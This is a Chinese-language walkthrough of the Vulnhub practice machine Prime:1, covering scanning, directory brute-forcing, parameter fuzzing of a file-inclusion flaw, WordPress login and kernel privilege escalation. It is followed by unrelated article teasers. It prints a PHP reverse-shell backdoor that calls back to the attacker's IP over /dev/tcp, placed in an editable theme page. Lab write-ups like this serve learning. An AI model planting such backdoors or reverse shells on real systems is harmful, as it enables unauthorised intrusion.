Vulnhub靶机:PRIME_ 1

news2024/12/23 21:00:40

目录

  • 介绍
  • 信息收集
    • 主机信息探测
    • 主机信息探测
  • 网站探测
    • 目录爆破
    • 排雷dirsearch
    • 强制访问
    • 文件包含漏洞
    • 利用WordPress
  • 提权
    • wordpress配置文件
    • 内核提权

介绍

系列:Prime(此系列共1台)
发布日期:2019年9月1日
难度:初-中
运行环境:VMware Workstation
目标:取得 root 权限 + Flag
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • 目录爆破
  • 文件扩展名爆破
  • 强制访问
  • 文件包含漏洞
  • WordPress利用
  • 内核提权

靶机地址:https://www.vulnhub.com/entry/prime-1,358/

信息收集

主机信息探测

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

发现网站存在wordpress,并且似乎存在漏洞

nmap -p- 192.168.229.136
nmap -p 22,80 -A 192.168.229.136
nmap -p 22,80 --script=vuln 192.168.229.136

在这里插入图片描述

网站探测

开局就是一个静态页面,页面源代码中没有任何有价值的信息,直接目录爆破
在这里插入图片描述

目录爆破

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404

在这里插入图片描述

首先,“dev”目录下提示,我需要更努力的爆破才行,针对WordPress的用户名枚举只发现了“victor”,漏洞枚举没有发现能打进去的漏洞。
进行二次目录爆破,这次对文件扩展进行爆破,结果就是没有发现什么有价值的信息

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404,403 -e php,txt

在这里插入图片描述

排雷dirsearch

到这里卡了一会,看了下别人的扫描方式,不由得感叹,碰上了dirsearch的一个暗坑。我在自己的物理机中,执行与上图同样的命令,结果发现了“secret.txt”。

python D:\tools\目录扫描\dirsearch-0.4.3\dirsearch.py --full-url -R 2 -x 404,403 -u http://192.168.229.136/ -f -e php,txt

在这里插入图片描述

那为什么使用同样的命令,在kali中,dirsearch没有发现这个结果呢?
首先,我的物理机上安装了dirsearch,我知道它字典的路径,借此我在kali中定位到了它的字典,确认存在“secret”目录。那就是说明字典没问题。然后要分析这个问题就需要做流量分析,我让dirsearch的流量全部经过我物理机上的bp

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404,403 -e php,txt --proxy=http://192.168.229.1:8080

在这里插入图片描述

过滤bp的流量,发现kali中的dirsearch压根没有访问“secret.txt”
在这里插入图片描述

到此基本确认了dirsearch的这个暗坑,我们常说要交叉不同的工具去测试目标,那么,换用别的工具再来测试一下呢?我这里让ffuf调用dirsearch的默认字典来扫描,顺利发现了目标

ffuf -u http://192.168.229.136/FUZZ -w /usr/lib/python3/dist-packages/dirsearch/db/dicc.txt -c -ic -r -e .txt,.php -fc 403,404

那么这个目录里是个什么东西呢?他告诉我们,要对每个php页面做进一步的模糊测试,并且提供了一个uri作为案例,但是我不需要。说白了,就是对得到的php页面做强制访问,强制访问的参数值是“location.txt”
在这里插入图片描述

强制访问

得到提示,对php页面用“secrettier360”作为参数会得到一些有趣的结果

ffuf -u http://192.168.229.136/index.php?FUZZ=location.txt -w /usr/share/wordlists/SecLists-2022.4/Discovery/Web-Content/common.txt -c -fs 136 -s

在这里插入图片描述

然后就发现了一个看似有趣的页面,它可以把其他页面的内容包含进来,这似乎是一个文件包含漏洞
在这里插入图片描述

在这里插入图片描述

文件包含漏洞

确认文件包含漏洞,并发现一条敏感信息
在这里插入图片描述

兜兜转转,最后得到这样一个结果:follow_the_ippsec
在这里插入图片描述

测试了一下,无法ssh登录

利用WordPress

枚举用户,发现用户:victor

wpscan --url http://192.168.229.136/wordpress/ -e u

尝试登录,于是密码: follow_the_ippsec 可以登录。简单搜寻一番后,发现了一处可以编辑的php页面

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.229.128/1234 0>&1'"); ?>

在这里插入图片描述

后门写上去了,怎么找到这个页面呢?如果你对wordpress不熟悉,可以这样:
首先使用dirb http://192.168.229.136/wordpress/去递归爆破站点,然后你会看到下图红框中的,wordpress的主题路径,然后根据后门坐在的页面,得出后门地址
在这里插入图片描述

顺利的话,你会拿到一个shell
在这里插入图片描述

提权

wordpress配置文件

针对wordpress提权,首先找一找配置文件,在配置文件中找到了一个密码,想要试着提权,失败了。
在这里插入图片描述

在这里插入图片描述

内核提权

发现靶机的内核版本是16.04,应该可以内核漏洞提权,之前打靶碰到过这个内核版本的靶机,直接抄以前的笔记,测试发现靶机有gcc和nc,既然在kali上编译好的文件不能用,那就在靶机上编译文件吧
在这里插入图片描述

在这里插入图片描述

投递原始的利用文件,在靶机上编译之后利用成功
在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/78315.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

在 Istio 服务网格中使用 Argo Rollouts 实现智能的渐进式发布

1 Argo Rollouts 介绍 Kubernetes 原生的 Deployment 利用 Rolling Update 滚动更新的策略在应用升级时提供基本的安全保证&#xff08;例如就绪探针&#xff09;。然而默认的滚动更新策略存在着一些明显的缺点&#xff0c;例如&#xff1a; 无法控制流向新版本的流量。无法控…

tensorflow入门(四)如何用tensorflow训练神经网络

参考 如何用tensorflow训练神经网络 - 云社区 - 腾讯云 在使用神经网络解决实际的分类或回归问题时需要设置好参数取值。下面介绍使用监督学习的方式来合理地设置参数取值&#xff0c;同时也将给出tensorflow程序来完成这个过程。设置神经网络参数的过程就是神经网络的训练过…

基于JDBC的MySQL数据库编程

✨博客主页: 荣 ✨系列专栏: MySQL ✨一句短话: 难在坚持,贵在坚持,成在坚持! 文章目录一. JDBC概述二. JDBC前置工作1. 准备好MySQL驱动包2. 创建项目三. JDBC的使用步骤1. 创建数据源DataSourece2. 连接数据库3. 构造并执行sql语句4. 释放资源5. sql语句不要写死(以插入为例)…

C++入门基础07:函数定义与声明、函数传参(传值、传地址、传引用)、函数重载

C入门基础07&#xff1a;函数定义与声明、函数传参&#xff08;传值、传地址、传引用&#xff09;、函数重载 1、函数定义与声明 函数是一起执行一个任务的一组语句。每个程序&#xff08;C/C&#xff09;都有一个主函数 main() &#xff0c; 所有简单的程序都可以定义其他额…

1563_AURIX_TC275_EVR的控制寄存器

全部学习汇总&#xff1a; GreyZhang/g_TC275: happy hacking for TC275! (github.com) 1. 连续的写入必须确保是解锁状态&#xff0c;否则的话可能会导致所有的总线阻塞。 2. 多核系统中&#xff0c;尽量写入之后再读取一下确认写入的状态。 这里是过压以及欠压的几个监控结果…

if、for、while结构的用法

分支与循环的流程控制一、分支流程控制1. if分支语句结构1). 单分支2). 双分支3). 三元运算符&#xff08;双分支的简化&#xff09;4). 多分支二. 循环流程控制1. while循环语句语法结构1.while循环用法2.while 的死循环3. while else的用法2. for循环语句语法结构1. for和ran…

嵌入式开发学习之--串口通讯(上)

提示&#xff1a;本篇开始学习各种通讯方式&#xff0c;重中之重。 文章目录前言一、 串口通讯协议简介1.1 物理层1.2 协议层1.2.1 基本组成。1.2.2 波特率1.2.3 起始和终止位1.2.4 有效数据1.2.5 数据校验二、USART结构体详解总结前言 作为一个嵌入式的开发者&#xff0c;解析…

网页木马挂马的实现与防范

一、网页挂马是什么 不少用户都碰到过这样的现象&#xff1a;打开一个网站&#xff0c;结果页面还没显示&#xff0c;杀毒软件就开始报警&#xff0c;提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码&#xff0c;这就是典型的网页挂马现象。那么是什么原因导致了这种…

数据库概论之MySQL表的增删改查 - 进阶版本1

MySQL表的增删改查 - 进阶1、数据库约束1.1 约束类型1.2 NULL约束1.3 UNIQUE约束1.4 DEFAULT约束1.5 PRIMARY约束1.6 FOREIGN KEY外键约束1.6.1 语法1.6.2 工作原理2、表的设计2.1 一对一2.2 一对多2.3 多对多大家好&#xff0c;已经好久没更新了 , 学校的学业有点忙 , 没有额外…

[论文解析] Denoising Diffusion Probabilistic Models

文章目录OverviewsWhat problem is addressed in the paper?What is the key to the solution?What is the main contribution?Contents扩散概率模型背景算法实验结论Overviews What problem is addressed in the paper? We present high quality image synthesis result…

【Java面试】说说类加载机制(流程)

文章目录加载流程装载(Load)链接(Link)验证(Verify)准备(Prepare)解析(Resolve)初始化(Initialize)卸载(Unload)加载流程 类的加载流程如下&#xff1a; 转载(Load)->链接(Link)->初始化(Initialize)->使用(Use)->卸载(Unload) 其中链接又包含验证(Verify)&#x…

rabbitMQ延时队列——TTL和DLX

一. 场景&#xff1a;“订单下单成功后&#xff0c;15分钟未支付自动取消” 1.传统处理超时订单 采取定时任务轮训数据库订单&#xff0c;并且批量处理。其弊端也是显而易见的&#xff1b;对服务器、数据库性会有很大的要求&#xff0c; 并且当处理大量订单起来会很力不从…

flask前后端项目--实例-前端部分:-4-vue-Element Plus

flask前后端项目--实例-前端部分&#xff1a;-4-vue-Element Plus组件添加事项 一、实验测试步骤 1.Element Plus添加 1.先备份App.VUE&#xff0c;然后修改app.vue的内容&#xff0c;数据来源资Element Plus的表格table 2. 数据来源资Element Plus的表格table 3. 运行服务&…

023_SSS_Neural 3D Video Synthesis from Multi-view Video(CVPR2022)

Neural 3D Video Synthesis from Multi-view Video(CVPR2022) 本文提出了一种新的3D视频生成方法&#xff0c;这种方法能够以紧凑但富有表现力的表示形式表示动态真实世界场景的多视图视频记录&#xff0c;从而实现高质量的视图合成和运动插值。 1. Introduction 本文的主要…

百度地图 ( 一 ) 显示地图

1.百度地图 百度地图开放平台 https://lbsyun.baidu.com/ 使用百度地图时导入JavaScript包 <script type"text/javascript" src"http://api.map.baidu.com/api?v2.0&ak您的密钥"></script>1.1.如何申请 ak 密钥 在 开发平台 找 控制…

ChatGPT注册流程

1.访问官网点击 Sign up https://chat.openai.com/auth/login 2.输入你的邮箱 3.点击Continue下一步: 4.输入密码继续下一步&#xff1a; 5.然后你的邮箱会受到一封邮件&#xff08;如果没收到请检查垃圾邮箱&#xff09;&#xff1a; 6.点击验证邮箱按钮&#xff0c;会跳到…

MySQL 5.7中文乱码与远程链接问题

MySQL 5.7中文乱码与远程链接问题1. MySQL 5.7中文乱码2. 远程链接问题3. 不区分表大小写4. 超过最大连接数5. 时区问题5. GROUP BY 问题配置集合重启MySQL1. MySQL 5.7中文乱码 当我们直接在数据库里面输入中文时&#xff0c;保存后出现&#xff1a; Incorrect string value&…

LeetCode 第 244 场周赛题解

前言 这是 2021-06-06 的一场 LeetCode 周赛&#xff0c;本场周赛的题目相较而以往而言比较简单&#xff0c;基本上想到点上就可以做出来&#xff0c;主要涉及到矩阵的旋转、贪心、滑动窗口、前缀和、二分查找等知识点。 第 244 场周赛链接&#xff1a;https://leetcode-cn.c…

SpringBoot+Vue实现前后端分离的学校快递站点管理系统

文末获取源码 开发语言&#xff1a;Java 使用框架&#xff1a;spring boot 前端技术&#xff1a;JavaScript、Vue.js 、css3 开发工具&#xff1a;IDEA/MyEclipse/Eclipse、Visual Studio Code 数据库&#xff1a;MySQL 5.7/8.0 数据库管理工具&#xff1a;phpstudy/Navicat JD…

机器人开发--雷达lidar

机器人开发--雷达lidar1 介绍2 分类2.1 整体分类2.2 机械式&#xff08;三角&ToF&#xff09;三角测距激光雷达ToF测距激光雷达3 机械式单线ToF激光雷达3.1 扫描原理3.2 不同材料反射率3.3 核心参数参考1 介绍 激光雷达&#xff08;英文&#xff1a;Laser Radar &#xff…